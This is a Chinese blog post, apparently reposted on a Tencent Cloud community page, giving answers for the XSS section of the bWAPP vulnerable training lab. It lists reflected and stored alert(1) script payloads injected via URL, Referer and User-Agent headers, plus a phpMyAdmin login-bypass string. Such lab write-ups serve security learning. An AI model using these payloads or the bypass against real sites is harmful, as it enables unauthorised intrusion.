专栏首页农夫安全Bwapp漏洞平台答案全解-A3(第二篇)

Bwapp漏洞平台答案全解-A3(第二篇)

前言

接上篇XSS,没啥好讲的,直接看答案吧

A3 - Cross-Site Scripting (XSS)

-3.11-XSS - Reflected(phpMyAdmin)

这个看文档说是phpmyadmin上的一个BBcode的XSS,具体没复现过。

CVE-2010-4480

补充:

PHPmyadmin 2.11.3和2.11.4万能密码漏洞

只需要输入账号 密码不需要输入

利用代码如下:‘localhost’@'@”

3.12-XSS - Reflected (PHP_SELF)

用户名注入:<script>alert(1)</script>

密码注入:<script>alert(1)</script>

URL注入:

http://172.16.0.225/bWAPP/xss_php_self.php/"><script>alert(1)</script>

3.13-XSS - Reflected (Referer)

URL:

http://192.168.0.155/bWAPP/xss_referer.php

手动添加referer可以造成跨站

Referer: http://www.google.com/search?q=<script>alert(1)</script>

3.14-XSS - Reflected (User-Agent)

URL:

http://192.168.0.155/bWAPP/xss_user_agent.php

3.15-XSS – Stored (Blog)

直接在留言板处输入

<script>alert(1)</script>

3.16-XSS - Stored (Change Secret)

问题参数在bee

这个是在源码里面会有输出bee

所以我们可以抓包修改

3.17-XSS - Stored (Cookies)

XSS代码插入在了set-cookie里面,看自己怎么构造

3.18-XSS - Stored (SQLiteManage)

URL:

" >http://172.16.88.250/sqlite/?5e57f"><script>alert(1)</script>

3.19-XSS - Stored (User-Agent)

以为页面有回显user-agent的值

在页面抓包:

将user-agent改成<script>alert(1)</script>

本文分享自微信公众号 - 网络安全社区悦信安(yuexin_an),作者:悦信安

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2017-07-26

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • XSS姿势——文件上传XSS

    一个文件上传点是执行XSS应用程序的绝佳机会。很多网站都有用户权限上传个人资料图片的上传点,你有很多机会找到相关漏洞。如果碰巧是一个self XSS,你可以看看...

    用户1467662
  • Bwapp漏洞平台答案全解-A3(第一篇)

    A3 - Cross-Site Scripting (XSS) *****************跨站脚本****************** 跨站的终极思路...

    用户1467662
  • 【weakfilescan】敏感文件扫描工具

    weakfilescan 基于爬虫,动态收集扫描目标相关信息后进行二次整理形成字典规则,利用动态规则的多线程敏感信息泄露检测工具,支持多种个性化定制选项,包括...

    用户1467662
  • Pikachu漏洞靶场系列之XSS

    跨站脚本攻击(Cross-Site Scripting)简称为“CSS”,为避免与前端叠成样式表的缩写”CSS”冲突,故又称XSS。一般XSS可以分为如下几种常...

    FB客服
  • Kali Linux Web渗透测试手册(第二版) - 5.3 - 利用XSS获取Cookie

    在前几章中,我们知道了攻击者可以使用cookie来冒充当前用户的身份,在上一章节我们也简单地引入了XSS的基本概念。如果目标站点存在XSS漏洞并且Cookie并...

    用户1631416
  • Kali Linux Web渗透测试手册(第二版) - 5.3 - 利用XSS获取Cookie

    thr0cyte,Gr33k,花花,MrTools,R1ght0us,7089bAt,

    7089bAt@PowerLi
  • 推荐一个jekyll博客模板

    本人用的模板是基于Codeboy的博客模板改造模板,(由于本人可能会有很多样式修改,所以不再将修改pullrequst到原项目,在此对codeboy模板表示感谢...

    付威
  • 哆啦靶场XSS挑战赛1-10关攻略

    哆啦集成了网络上常见的靶场与GitHub上比较好的靶场系统,配合一键启动模式,省去你去收集再进行搭建的时间,方便你更加快速的学习信息安全。

    周俊辉
  • 传说中Python最难理解的点,看这完篇就够了

    本文转载自简书,作者为菜鸟,感谢作者的辛苦付出。 这不是我第一次学Python入门课,去年、前年我都学过Python入门。所以文章的标题一点都没有标题党的意思。...

    小小科
  • 自定义网页QQ登录按钮

    QQ互联为网页的 QQ 登录提供了统一接口,但是其样式比较固定,风格陈旧,没有提供完全自定义的接口。在此介绍一种自定义按钮风格的方法。

    tonglei0429

扫码关注云+社区

领取腾讯云代金券